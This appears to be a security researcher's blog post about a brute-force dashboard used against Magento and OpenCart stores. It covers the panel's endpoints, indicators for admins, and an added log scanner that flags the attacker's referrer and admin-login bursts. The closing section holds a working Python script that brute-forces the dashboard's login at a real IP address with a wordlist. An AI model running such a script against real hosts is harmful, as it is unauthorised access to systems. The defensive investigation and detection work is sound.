An OpenCart/Magento hacking dashboard


This post shows how sophisticated Magento hacking operations have become.

While investigating a bruteforced Magento store, I noticed that the hacker logged in using a curious referrer site:

"GET /rss/catalog/notifystock/ HTTP/1.1" 200 5676 "http://194.87.232.147:777/"

The site at http://194.87.232.147:777/ shows:

[Screenshot: brute force dashboard login page]

A “Magento report panel” asks for a Пароль (password). The page source (beautified JS) contains some clues about its password-protected functionality:

$.post("/home/getServers", function(n) {
$.post("/home/GetCountGoodLastDay", function(n) {
$.post("/home/GetCountServerLastDay", function(n) {
$.post("/home/GetCountSuccessLastDay", function(n) {
$.post("/home/ChangeMarkState", {
$.post("/home/ChangeComment", { 
$.post("/home/getCount", { 
$.post("/home/ChangeShell", {
$.post("/home/ChangeReservedLogins", {

Judging by these endpoints, somebody has built a dashboard to manage Magento brute-force operations at scale: it reports daily counts of servers found and logins that succeeded, lets the operator mark servers as “success” and attach comments, and, given the referrer in the log line above, is used to log in to the backend of the hacked stores.

I checked my forensic notes of previous cases and found that this dashboard was used in at least one other case. Sysadmins, check your server logs for requests carrying this referrer.
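As an added example (not code from the original post), here is a small scanner for combined-format access logs that flags both things worth looking for after an incident like this: requests whose Referer points at the dashboard host 194.87.232.147:777 (the value observed above), and bursts of POSTs to the admin login from a single address. The admin path /index.php/admin/, the threshold of 20 attempts and the sample log lines are constructed assumptions for illustration; adapt them to your store.

```python
#!/usr/bin/env python3
"""
Flag two indicators in an Apache/nginx combined-format access log:
  1. any request whose Referer points at the attacker's dashboard host
  2. any client that POSTs to the admin login BRUTE_THRESHOLD times or more

Added example, not code from the original post. The dashboard host is the
one observed in the post; the admin path, the threshold and the sample log
lines are constructed assumptions.
"""
import re
from collections import Counter
from typing import Dict, List, Optional

DASHBOARD_HOST = "194.87.232.147:777"                      # observed in the post
ADMIN_PATH_RE = re.compile(r"^/(index\.php/)?admin(/|$)")  # assumption: Magento 1 admin URL
BRUTE_THRESHOLD = 20                                       # assumption: POSTs per IP before flagging

# Combined log format:
# ip ident user [time] "METHOD path PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def referer_host(referer: str) -> str:
    """Extract host[:port] from a Referer value; '' for '-' or malformed values."""
    m = re.match(r"^[a-zA-Z][a-zA-Z0-9+.-]*://([^/?#]+)", referer)
    return m.group(1).lower() if m else ""


def scan(lines: List[str]) -> Dict[str, object]:
    """Scan log lines; return dashboard-referrer hits and IPs at or over the brute-force threshold."""
    dashboard_hits: List[Dict[str, str]] = []
    admin_posts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # not combined format (or a truncated line); skip rather than crash
        if referer_host(rec["referer"]) == DASHBOARD_HOST:
            dashboard_hits.append(rec)
        if rec["method"] == "POST" and ADMIN_PATH_RE.match(rec["path"]):
            admin_posts[rec["ip"]] += 1
    brute = {ip: n for ip, n in admin_posts.items() if n >= BRUTE_THRESHOLD}
    return {"dashboard_hits": dashboard_hits, "brute_force_ips": brute}


# Constructed sample log: one ordinary visitor, the referrer pattern seen in the
# post, and a burst of admin login POSTs from the same address as the referrer hit.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Apr/2016:09:00:01 +0000] "GET /index.php/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Apr/2016:09:31:40 +0000] "GET /rss/catalog/notifystock/ HTTP/1.1" 200 5676 "http://194.87.232.147:777/" "Mozilla/5.0"',
] + [
    '203.0.113.5 - - [10/Apr/2016:09:12:%02d +0000] "POST /index.php/admin/ HTTP/1.1" 200 4410 "-" "Mozilla/5.0"' % i
    for i in range(25)
]

if __name__ == "__main__":
    result = scan(SAMPLE_LOG)
    for hit in result["dashboard_hits"]:
        print("dashboard referrer: %s %s %s" % (hit["ip"], hit["method"], hit["path"]))
    for ip, n in result["brute_force_ips"].items():
        print("possible brute force: %s (%d admin POSTs)" % (ip, n))
```

Run it against a real log with `scan(open("access.log").readlines())`. A referrer hit is strong evidence on its own; the POST count is only a heuristic, so tune the threshold to the normal admin traffic of the store and check whether the burst is followed by a request from the same address that looks like a successful login.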

Update April 11th: Super-sleuth Len Lorijn noted that an “Opencart Report Panel” is running on the same server. This signifies that e-commerce hackers are platform-agnostic. If there’s money flowing through it, it’s worth hacking.

Returning the favour

What if the bruteforcer got bruteforced? Now, I won’t do that, as it is not allowed in my country. But in theory, you could use something like this (provided for educational purposes only):

#!/usr/bin/env python3
"""
Brute force the admin password
of a Russian brute forcer's admin panel
"""

import requests

URL = 'http://194.87.232.147:777/Account/Login'

print("Downloading Russian wordlist...")
wordlist = requests.get(
    'https://github.com/svetlitskiy/wordlist-russian/blob/master/russian-words.json?raw=true',
    timeout=30,
).json()

session = requests.Session()
for word in wordlist:
    print("Trying {}".format(word))
    resp = session.post(URL, data=dict(Password=word), timeout=10)
    # A wrong password gets the login form back; a correct one lands
    # elsewhere. Compare against resp.text (str): resp.content is bytes,
    # and 'str in bytes' raises TypeError on Python 3.
    if resp.status_code == 200 and 'form action="/Account/Login"' not in resp.text:
        print("{} looks good!".format(word))
        break

Yours truly: security consultant & researcher, tracking payment skimmers since 2015. I am also the founder of the open-source malware scanner and Magereport. If you could use an extra pair of eyes in your team to resolve a complicated security issue, do get in touch.